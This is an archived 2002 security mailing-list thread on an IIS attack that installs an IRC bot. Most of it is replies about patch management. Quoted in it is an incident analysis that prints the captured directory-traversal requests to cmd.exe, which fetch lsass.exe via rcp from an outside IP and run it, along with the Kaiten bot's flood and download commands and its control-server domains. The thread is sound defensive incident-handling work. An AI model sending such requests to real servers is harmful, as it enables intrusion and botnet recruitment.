RE: new IIS worm? (rcp lsass.exe)
From: John Campbell (jcampbell@wsipc.org)Date: 09/24/02
- Previous message: James P. Kinney III: "slapper worm varient "cinik""
- Maybe in reply to: Christian Mock: "new IIS worm? (rcp lsass.exe)"
- Next in thread: zeno: "Re: new IIS worm? (rcp lsass.exe)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 24 Sep 2002 14:41:28 -0700 From: "John Campbell" <jcampbell@wsipc.org> To: "zeno" <bugtraq@cgisecurity.net>
I actually prefer the opportunity to pick and choose. Not all hotfixes
are necessary for a given installation, and historically at least, they
aren't regression-tested as fully as services packs, (which aren't
always perfect when they hit the street either.)
If you do a lot of servers, it may make sense to set one up manually,
test it thoroughly, then clone it with a disk imaging tool.
-----Original Message-----
From: zeno [mailto:bugtraq@cgisecurity.net]
Sent: Tuesday, September 24, 2002 2:08 PM
To: John Campbell
Cc: incidents@securityfocus.com
Subject: Re: new IIS worm? (rcp lsass.exe)
>
> Windows Update from you-know-who actually does what you describe. I'd
> always been leery of it, but tried it out recently when setting up a
> W2K test server, and it performed as advertised. It did take several
> iterations to get everything updated, owing to various dependencies.
When I used windows update it downloaded the patches but didn't install
them. I had to manually go through each one. While this isn't a big deal
I am looking for something 100 percent automated with install of the
patches. Perhaps I'm missing something I deal mostly with unix.
- zeno
>
> Regards,
>
> John Campbell, CISSP, GCWN
> Information Security Engineer
> Washington School Information Processing Cooperative
> (WSIPC)
> Everett, Washington, USA
>
> -----Original Message-----
> From: zeno [mailto:bugtraq@cgisecurity.net]
> Sent: Tuesday, September 24, 2002 11:29 AM
> To: Mark Challender
> Cc: 'pj@esec.dk'; incidents@securityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
> >
> > Hardening of IIS with the tools available at Microsoft and using
> > URLSCAN with the EXE blocking on will stop these attacks.
> >
> > Patch, patch, patch, recheck the patches and use URLSCAN!
>
> Does anyone know of a gui windows tool that scans your system and
> provides you with a list of needed patches, and then allows you to
> select, and have it autodownload and install them? I can't seem to
> find one (needed mostly for iis).
>
> - zeno@cgisecurity.com
>
>
>
> >
> > Mark Challender
> > Network Administrator
> >
> > ==================
> > Veni, Vidi, Geeki
> > ==================
> >
> >
> > -----Original Message-----
> > From: pj@esec.dk [mailto:pj@esec.dk]
> > Sent: Monday, September 23, 2002 3:27 AM
> > To: incidents@securityfocus.com
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> >
> >
> > Christian Mock:
> >
> > >Then it seems to go after the web servers, sending the following:
> >
> > >GET
> > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
> > as
> > s.exe+
> > .
> > HTTP/1.0..
> >
> > >and
> >
> > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> >
> > >I've been able to get hold of that lsass.exe binary (9728 bytes),
> > >but
>
> > >I lack the skills to analyze it; I'll happily mail it to anybody
> > >who
> > >asks.
> >
> >
> > We have seen this attack from 4 different sources since Sept. 16,
> > and
> > have informed the owner of 64.21.95.7 and downloaded the lsass.exe
for
>
> > investigation.
> >
> > Based on the attack rate this is most likely a scripted or manual
> > attack, not a worm.
> >
> > Judging from the embedded string in this compressed binary it
> > appears to be an IRC bot based on the kaiten.c code written by
> > contem@efnet, the author of the Slapper worm :
> >
> > Kaiten Win32 API version 2002 by contem@efnet
> >
> > The binary contains these domainnames, most likeky IRC servers used
> > for controlling the bot:
> >
> > telsa5.mine.nu (Korea)
> > irc.logicfive.net (Taiwan)
> > moncredo.shacknet.nu (USA)
> > telsacredo.shacknet.nu (USA)
> > lar.ath.cx (Taiwan)
> >
> > The program accepts commands to make various DOS attacks or download
> > new version or executables with http:
> >
> > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> > NOTICE %s :NICK <nick> = Changes the nick of the
> client
> > NOTICE %s :DISABLE <pass> = Disables all packeting
from
> this
> > client
> > NOTICE %s :ENABLE <pass> = Enables all packeting
from
> this
> > client
> > NOTICE %s :UPDATE <http address> = Downloads a file off the
> web and
> > updates the client
> > NOTICE %s :RUN <http address> = Downloads a file off the
> web and
> > runs it
> > NOTICE %s :GET <http address> = Downloads a file off the
> web
> > NOTICE %s :ADDSERVER <server> = Adds a server to the list
> > NOTICE %s :DELSERVER <server> = Deletes a server from the
> list
> > NOTICE %s :LISTSERVERS = Lists server on the list
> > NOTICE %s :KILL = Kills the client
> > NOTICE %s :VERSION = Requests version of
client
> > NOTICE %s :HELP = Displays this
> >
> >
> > There seems also to be a default account and password in the german
> > language included in this specific version of Kaiten.
> >
> > The IIS attack that tries to inject this Trojan usually has another
> > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an
> > connection to port 6667(IRC) on chat.vtm.be.
> >
> >
> >
> > Peter Jelver
> > ...
> >
> > eSec A/S
> >
> > http://www.esec.dk
> >
......................................................................
> > ......
> > .
> >
> > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
> >
> >
> >
> >
> >
> > --------------------------------------------------------------------
> > --
> > ------
> > This list is provided by the SecurityFocus ARIS analyzer service.
> > For more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
> >
> > --------------------------------------------------------------------
> > --
> > ------
> > This list is provided by the SecurityFocus ARIS analyzer service.
> > For more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
> >
> >
>
>
> ----------------------------------------------------------------------
> --
> ----
> This list is provided by the SecurityFocus ARIS analyzer service. For
> more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: James P. Kinney III: "slapper worm varient "cinik""
- Maybe in reply to: Christian Mock: "new IIS worm? (rcp lsass.exe)"
- Next in thread: zeno: "Re: new IIS worm? (rcp lsass.exe)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
